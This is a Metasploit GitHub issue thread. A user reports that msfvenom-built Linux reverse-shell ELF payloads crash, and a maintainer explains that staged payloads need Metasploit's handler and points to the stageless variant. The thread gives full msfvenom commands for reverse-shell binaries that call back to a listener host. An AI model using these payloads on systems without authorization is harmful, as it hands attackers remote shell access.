### ISSUE TITLE
segmentation fault for reverse shell linux both x86 and x64

### ISSUE THREAD

**Issue by robomotic** [rapid7/metasploit-framework#12142]
## Steps to reproduce

`msfvenom -p linux/x64/shell/reverse_tcp -b "\x00" LHOST=1.2.3.4 LPORT=1234 -f elf -o ./payloads/linuxx64shell.elf`

or 

`msfvenom -p linux/x86/shell/reverse_tcp -b "\x00" LHOST=1.2.3.4 LPORT=1234 -f elf -o ./payloads/linuxx86shell.elf`

Run the binaries:

- chmod +x 
- run them ./linuxx64shell.elf
- run them ./linuxx86shell.elf

## Expected behavior

A successful connection with the listening netcat service.
Tested with both netcat client server and the connection is working.

## Current behavior

Output: segmentation fault
Let me know if you need the dump.

### Metasploit version

- 4.17.17-dev
- v5.0.39-dev

### I installed Metasploit with:
- [X] Kali package via apt
- [X] Omnibus installer (nightly)
- [X] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)

### OS

Linux and Ubuntu.

**Comment by busterb** [comment]
This is expected behavior with a staged payload, which simply consumes the first set of bytes it receives and then _executes_ it. The first thing that should be sent by the client is shellcode, so using netcat will not work. If you want this to work as-is, use Metasploit to connect to the payload, or instead use the 'single' version which does not execute shellcode itself, e.g.: `linux/x86/shell_reverse_tcp` (note the underscore instead of the slash between 'shell' and . 'reverse_tcp')

**Comment by robomotic** [comment]
Goddamn it underscores!
